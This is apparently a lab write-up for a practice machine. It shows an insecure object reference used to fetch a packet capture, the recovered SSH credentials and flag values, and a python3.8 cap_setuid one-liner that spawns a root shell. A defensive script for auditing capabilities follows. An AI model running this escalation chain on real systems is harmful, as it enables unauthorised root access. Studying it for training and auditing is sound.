Browsing the web application, we land on the page http://10.10.10.245/data/4. By default it sets us to the number 4, or file 4. If we change the number in the request to 0, we can download a .pcap file containing all network traffic, from which we can capture the username and password for nathan.

USER nathan

PASS Buck3tH4TF0RM3!

SSH in as nathan:

nathan:Buck3tH4TF0RM3!

user.txt - 43a60c707e9ee55d3c1c067366cfdc97

Running linPEAS, we can see that python has SUID/capabilities set, and looking at GTFOBins we can exploit this.

Navigate to /usr/bin:

./python3.8 -c 'import os; os.setuid(0); os.system("/bin/sh")'

We are root.

root.txt - 7ecaf1f3cf53a5de0e4ba676e2693e3a
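
To audit a host for the misconfiguration used in the last step, the output of `getcap -r /` can be parsed and any interpreter holding an identity-changing capability flagged. This is an added example, not part of the original write-up; the sample lines, the extra paths and the DANGEROUS and INTERPRETER lists are constructed assumptions.

```python
import os
import re

# Capabilities that allow changing identity or bypassing file permission checks.
DANGEROUS = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
             "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown", "cap_fowner"}
# Binaries that run caller-supplied code, so the caller inherits whatever they hold.
INTERPRETER = re.compile(r"^(python|perl|ruby|php|node|lua|tclsh|gdb|vim?|bash|sh)[\d.]*$")
# Older libcap prints "/path = caps+eip"; newer versions print "/path caps=eip".
LINE = re.compile(r"^(?P<path>/.+?)(?: =)? (?P<clauses>(?:cap_|=)\S*(?: \S+)*)$", re.M)
# One whitespace-delimited clause: optional capability list, then operator/flag groups.
CLAUSE = re.compile(r"(?<!\S)([a-z0-9_,]*)((?:[=+-][eip]*)+)(?!\S)")


def granted_caps(clauses):
    """Return capability names raised into the permitted or effective set."""
    granted = set()
    for names, ops in CLAUSE.findall(clauses):
        # Flags after '=' or '+' are raised; flags after '-' are lowered.
        raised = "".join(re.findall(r"[=+]([eip]*)", ops))
        if "p" in raised or "e" in raised:
            # An empty capability list (e.g. "=ep") means every capability.
            granted.update(n for n in (names or "all").split(",") if n)
    return granted


def audit(getcap_output):
    """Return sorted (severity, path, capability) findings from getcap output."""
    findings = []
    for m in LINE.finditer(getcap_output):
        path = m.group("path")
        is_interp = bool(INTERPRETER.match(os.path.basename(path)))
        for cap in granted_caps(m.group("clauses")):
            if cap == "all" or cap in DANGEROUS:
                findings.append(("critical" if is_interp else "review", path, cap))
    return sorted(findings)


# Constructed sample of `getcap -r / 2>/dev/null` output (not captured from the target).
SAMPLE = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/mtr-packet cap_net_raw=ep
/opt/tools/perl5.30 cap_setuid=ep
/usr/local/bin/backup cap_dac_read_search=ep
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(*finding)
```

A "critical" finding is remediated by removing the capability from the file with `setcap -r <path>`.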